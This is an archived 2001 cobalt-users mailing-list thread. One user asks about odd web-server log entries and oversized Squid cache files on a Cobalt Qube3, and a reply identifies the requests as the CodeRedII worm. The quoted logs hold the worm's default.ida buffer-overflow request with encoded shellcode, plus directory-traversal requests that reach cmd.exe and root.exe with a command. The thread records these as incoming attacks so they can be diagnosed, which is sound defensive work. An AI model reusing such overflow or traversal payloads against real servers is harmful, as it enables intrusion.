[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Strange requests & SQUID cache cleanup on Qube3

Its Called CodeRedII .. You are being attacked ..

Brian

-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Graphics 800
Sent: Thursday, August 30, 2001 3:46 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Strange requests & SQUID cache cleanup on Qube3


Hi all!

1. Every day my server is requested for non-existing page (default.ida).
Requests (approx. 200 per day) are sent from various IP addreses with
referer 1264 or "-". Here is an example lines from "home-error"  and
"home-access" files 13:24:20 2001] [error] [client 195.206.2.21] File
does not exist: /home/groups/home/web/default.ida

195.206.2.21 - - [29/Aug/2001:13:24:20 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 1264 "-" "-"

195.13.204.194 - - [29/Aug/2001:13:35:32 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 200 - "-" "-"

There are also strange requests (less frequent) made for "cmd.exe" file
from various IP: [Sun Aug 26 00:32:42 2001] [error] [client
213.96.133.152] File does not
exist: /home/groups/home/web/scripts/..ù???Æ../winnt/system32/cmd.exe
[Sun Aug 26 00:32:44 2001] [error] [client 213.96.133.152] File does not
exist: /home/groups/home/web/scripts/..ü????Æ../winnt/system32/cmd.exe
[Sun Aug 26 00:32:46 2001] [error] [client 213.96.133.152] File does not
exist: /home/groups/home/web/scripts/root.exe /c+dir+C:\

Can someone explain me, what is a problem?
How much these requests (200-250 per day) enlarge my outgoing traffic?
(I've noticed significant outgoing traffic growth when these strange
requests appeared).


2. How can I cleanup Webcache caching files? Seems that they grows
constantly from time when I started Webcache and my cache.log file is
full with warning messages. Turning Webcache off and on don't resolve
the problem.

2001/08/21 18:06:07| Starting Squid Cache version 2.3.STABLE3 for
i586-pc-linux-gnu... ............... 2001/08/21 18:06:28| Done reading
/home/squid2/cache swaplog (303058
entries)
2001/08/21 18:06:28| Finished rebuilding storage from disk. 2001/08/21
18:06:28| 303058 Entries scanned 2001/08/21 18:06:28| 0 Invalid entries.
2001/08/21 18:06:28| 0 With invalid flags. 2001/08/21 18:06:28| 303058
Objects loaded. 2001/08/21 18:06:28| 0 Objects expired. 2001/08/21
18:06:28| 0 Objects cancelled. 2001/08/21 18:06:28| 0 Duplicate URLs
purged. 2001/08/21 18:06:28| 0 Swapfile clashes avoided. 2001/08/21
18:06:28| Took 21.4 seconds (14130.7 objects/sec). 2001/08/21 18:06:28|
Beginning Validation Procedure 2001/08/21 18:06:30| 262144 Entries
Validated so far. 2001/08/21 18:06:30| Completed Validation Procedure
2001/08/21 18:06:30| Validated 303058 Entries 2001/08/21 18:06:30|
store_swap_size = 3851052k 2001/08/21 18:06:31| WARNING: Disk space over
limit: 3851052 KB > 512000 KB


Thanks
Arnis

_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users